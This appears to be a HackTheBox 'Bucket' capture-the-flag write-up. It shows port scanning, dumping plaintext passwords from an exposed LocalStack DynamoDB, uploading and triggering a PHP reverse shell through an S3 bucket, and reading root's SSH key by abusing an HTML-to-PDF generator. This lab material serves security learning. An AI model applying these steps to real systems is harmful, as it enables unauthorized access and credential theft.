User
Started by enumerating ports as always:
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ sudo scan bucket.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,80
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18💿9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL: 0
Furious: 16
Nmap: 9
Total: 25
The first thing we see in the landing page is:
If we take a look where the images are being stored it’s under the following direction http://s3.bucket.htb/adserver/images/
. So it is using s3 buckets as storage.
Since htb machines are in local without internet access they may be using LocalStack and found this article on how to run aws-cli
within localstack.
Firstly we checked if there is any data inside dynamodb:
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb list-tables
TABLENAMES users
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users
None 3 3
PASSWORD Management@#1@#
USERNAME Mgmt
PASSWORD Welcome123!
USERNAME Cloudadm
PASSWORD n2vM-<_K_Q:.Aa2
USERNAME Sysadm
[jusepe@nix:~/Documents/HackTheBox/Bucket]$
And then used s3 buckets to upload a php reverse shell:
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb s3 cp reverse.php s3://adserver
upload: ./reverse.php to s3://adserver/reverse.php
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ curl http://bucket.htb/reverse.php
Now we have a shell, and checked what users are in the system and we can login as roy
with the last password from dynamodb
Root
Checked if there is any service running on localhost and found what looks like a web:
roy@bucket:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:34825 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
Additionally the source code is readable by us inside /var/www/html/bucket_app
so checked what it does and there is an interesting functionality:
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
It is taking the data from dynamodb alert’s table and printing it to a pdf, so tried if there is ssrf to path disclosure in the html to pdf generator, following this guide. Then created a python script to automate the dynamo table creation and inserting the malicious alert, also getting the base64 of the file we want (id_rsa in this case).
|
|
Finally we decode the file base64 and create the pdf:
[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ python3 get_root_file.py | base64 -d > id_rsa.pdf
[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ open id_rsa.pdf
Here is how the pdf looks like: